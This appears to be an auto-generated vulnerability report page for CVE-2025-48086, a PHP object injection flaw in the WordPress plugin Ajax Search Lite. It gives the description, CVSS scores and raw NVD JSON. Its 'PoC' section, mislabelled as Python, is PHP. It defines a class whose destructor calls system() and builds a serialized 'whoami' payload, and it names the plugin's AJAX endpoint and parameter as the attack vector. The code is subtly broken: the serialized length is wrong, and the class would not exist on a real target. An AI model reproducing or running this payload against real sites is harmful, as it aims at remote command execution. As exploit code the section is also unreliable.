Security Vulnerability Report
中文
CVE-2025-48086 CVSS 5.5 MEDIUM

CVE-2025-48086

Published: 2025-11-06 16:15:52
Last Modified: 2026-04-27 20:16:07

Description

Deserialization of Untrusted Data vulnerability in wpdreams Ajax Search Lite ajax-search-lite allows Object Injection.This issue affects Ajax Search Lite: from n/a through <= 4.13.3.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ajax Search Lite <= 4.13.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-48086 PoC - PHP Object Injection // Target: WordPress Ajax Search Lite Plugin <= 4.13.3 class EvilClass { public $cmd; function __destruct() { // This will be executed during unserialization system($this->cmd); } } // Gadget chain construction (simplified example) $payload = 'O:9:"EvilClass":1:{s:3:"cmd";s:12:"whoami";}'; // For actual exploitation, construct payload based on available gadget chains // and send via WordPress AJAX endpoint or plugin's search functionality echo "PoC Payload (Base64): " . base64_encode($payload) . "\n"; echo "This payload can be injected via plugin's vulnerable deserialization point.\n"; // Example attack vector: // POST /wp-admin/admin-ajax.php // action: ajax_search_lite_search // asl_data: [malicious_serialized_payload] ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48086", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:52.120", "lastModified": "2026-04-27T20:16:06.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in wpdreams Ajax Search Lite ajax-search-lite allows Object Injection.This issue affects Ajax Search Lite: from n/a through <= 4.13.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ajax-search-lite/vulnerability/wordpress-ajax-search-lite-plugin-4-13-3-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}